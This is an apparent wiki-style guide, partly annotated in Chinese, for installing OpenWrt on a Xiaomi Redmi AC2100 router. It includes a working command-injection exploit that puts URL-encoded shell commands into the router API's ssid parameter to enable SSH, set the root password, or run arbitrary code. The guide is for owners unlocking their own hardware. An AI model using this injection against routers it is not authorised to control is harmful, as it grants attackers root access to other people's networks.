Xiaomi Redmi Router AC2100

The Xiaomi Redmi Router AC2100 is a wireless router based on the MT7621 platform. While it can be acquired for relatively low cost compared to other units with similar specifications, it requires a somewhat complex installation process in order to bypass a locked down stock firmware to install OpenWrt. However, a recently discovered web exploit has facilitated the procedure significantly.

Supported Versions

Hardware Highlights

Installation

Method : Web Exploit

From Xiaomi AX3600 SSH Guide for the ax3600 router.

Requirements

1. A computer with an ethernet adapter
2. One ethernet cable
3. MiWifi (stock) firmware version 2.0.23 installed on the router
4. The OpenWrt installation images for this device (from table above)
5. An SSH client

This exploit also works with firmware 2.0.503

Obtain SSH Access using a Web Exploit

1. Upgrade/downgrade to stock firmware version 2.0.23 (md5sum ca32a6cb7e60df65a391fe5f235fb720)
2. Connect the computer to one of the ethernet ports of the router (not the Internet port)
3. Set the router admin password via the router web interface
4. Login to the web interface using the password you just set and get the value of stok= from the URL:http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
5. Think of a password for SSH logins (8+ chars long, no special chars)
6. Enable SSH and set the SSH password

• Manually entering URLs

Access the following URL in a browser to enable SSH on the router. Replace <STOK> with the value gained above.

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

示例：http://192.168.31.1/cgi-bin/luci/;stok=f38d1ba0dadb2594cc33016363d644e4/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

… will execute the following commands（不需要输入）:

nvram set ssh_en=1;
nvram commit;
sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear;
/etc/init.d/dropbear start;

Enter the next URL to set the SSH root password to <PASSWORD> (replace it with your new root password).

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27<PASSWORD>%5Cn<PASSWORD>%27%20%7C%20passwd%20root%0A

示例：http://192.168.31.1/cgi-bin/luci/;stok=f38d1ba0dadb2594cc33016363d644e4/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27password%5Cnpassword%27%20%7C%20passwd%20root%0A

… will execute the following commands:

echo -e "<PASSWORD>\n<PASSWORD>" | passwd root

You can actually execute any shell code like this（示例，不用输入）:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0A<YOUR-CODE>%0A

Connect via SSH

Log in to the router via SSH as root, e.g. on a terminal (check SSH access for newcomers if unsure)

ssh root@192.168.31.1

The password will be <PASSWORD>, as we set it before.

As soon you have shell access, execute:

# Enable uart and boot_wait, useful for testing or recovery if you have an uart adapter!
nvram set uart_en=1
nvram set boot_wait=on
nvram set bootdelay=5

# Set kernel1 as the booting kernel
nvram set flag_try_sys1_failed=1

# Commit our nvram changes
nvram commit

Firmware Installation

# Copy the firmware files to the router（使用Mobaxterm的上传功能即可）Open a new terminal on your computer and change to the directory where you downloaded the firmware files. To copy the files to the router, execute

scp openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin root@192.168.31.1:/tmp
scp openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin root@192.168.31.1:/tmp

#Back in the terminal connected to the router through SSH, change to the directory where the firmware files are

cd /tmp

#Flash the kernel

mtd write openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin kernel1

#Flash the rootfs

mtd -r write openwrt-23.05.3-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin rootfs0

If all has gone well, the router will reboot to OpenWrt. If not, please wait at least 5 minutes, try manually rebooting the router.

参考链接：

[OpenWrt Wiki] Xiaomi Redmi Router AC2100

下载适用于您设备的 OpenWrt 固件